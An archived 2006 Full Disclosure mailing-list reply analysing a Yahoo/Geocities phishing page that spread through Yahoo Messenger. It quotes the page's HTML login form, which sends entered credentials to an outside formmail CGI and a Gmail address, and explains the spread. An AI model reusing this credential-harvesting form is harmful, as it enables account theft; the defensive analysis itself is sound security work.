Full Disclosure mailing list archives
Re: Yahoo/Geocities possible exploit/vulnerability
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Tue, 15 Aug 2006 13:01:27 +1200
Jain, Siddhartha wrote:
I was logged onto Yahoo Messenger (version 7.5 on WinXP SP2 Pro), when I got a message from a friend's ID: Pxxxx Bxxxxx (8/14/2006 4:25:50 PM): ---> www.geocities.com/now_thats_funny_210/ Clicking on the link took me to a page with the URL as above in the address bar and yahoo/geocities page that asks for username and password. On entering the username and password, the next page displayed was my photo album on yahoo but the URL in the address bar still remained the same as above!!
D'oh -- you've been phished! Double-D'oh -- you announced it on Full-Disclosure!! The URL you were sent is a phishing page. The form submission code looks like the following (brain-damaged "smart" HTML rendering MUAs may start to suck about here -- if that's yours, get a better one): <legend>Login Form</legend> <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="whoaenator () gmail com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"> <INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos"> [...] Basically, your Yahoo ID and password were sent to an open "formmail" CGI at fiberbit.net which sent those details (plus some other stuff based on reverse DNS, etc of the apparent IP submitting the form) via Email to whoaenator () gmail com and then the form-processing CGI redirected your browser to your "real" Yahoo! Photos page, http://photos.yahoo.com/ph//my_photos. If it did this without prompting you for login (as it did for me) I guess that means you had an already active Yahoo! session in your browser.
Next thing I noticed that Yahoo Messenger had frozen.
My guess here is (thankfully I'm not a YIM expert) that YIM only allows one login per ID and kicks _old_ ones when a new session is initiated from an already active ID. Thus getting logged out of YIM would mean that the bot picking up and processing whoaenator () gmail com's Emails had logged into YIM, presumably to send messages like the one you got to your whole contact list. Lather, rinse, repeat...
I changed my yahoo password and un-installed Yahoo Messenger.
Damage already done though, methinks. I mean, good for changing your password, but as all I can see this doing for now is spimming that link, the damage is done. Of course, changing your password means that they cannot re-use your credentials in future, should they recorded them for possible future use. I suspect that this was also supposed to try to exploit some or other recent-ish IE security vulnerability, but due to incompetence on the part of the person setting it up, they fluffed this aspect of the intended "attack". I mean, WTF otherwise is the explanation of this from the middle of the "now_thats_funny_210" page? <script language='javascript' src='http://127.0.0.1:1894/js.cgi?pcaw&r=4886'></script>
When I asked my friend about the message, he said he didn't send the message but received a similar message from his wife in the morning who hadn't sent it either.
They've both already been hit -- be nice and strongly commend them to change their passwords and then trace it back from his wife to whoever she got it from, et seq... Regards, Nick FitzGerald _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Yahoo/Geocities possible exploit/vulnerability Jain, Siddhartha (Aug 14)
- Re: Yahoo/Geocities possible exploit/vulnerability Nick FitzGerald (Aug 14)
- <Possible follow-ups>
- RE: Yahoo/Geocities possible exploit/vulnerability Jain, Siddhartha (Aug 14)
- Re: Yahoo/Geocities possible exploit/vulnerability Schanulleke (Aug 14)
- RE: Yahoo/Geocities possible exploit/vulnerability Nick FitzGerald (Aug 15)
- Re: Yahoo/Geocities possible exploit/vulnerability crazy frog crazy frog (Aug 15)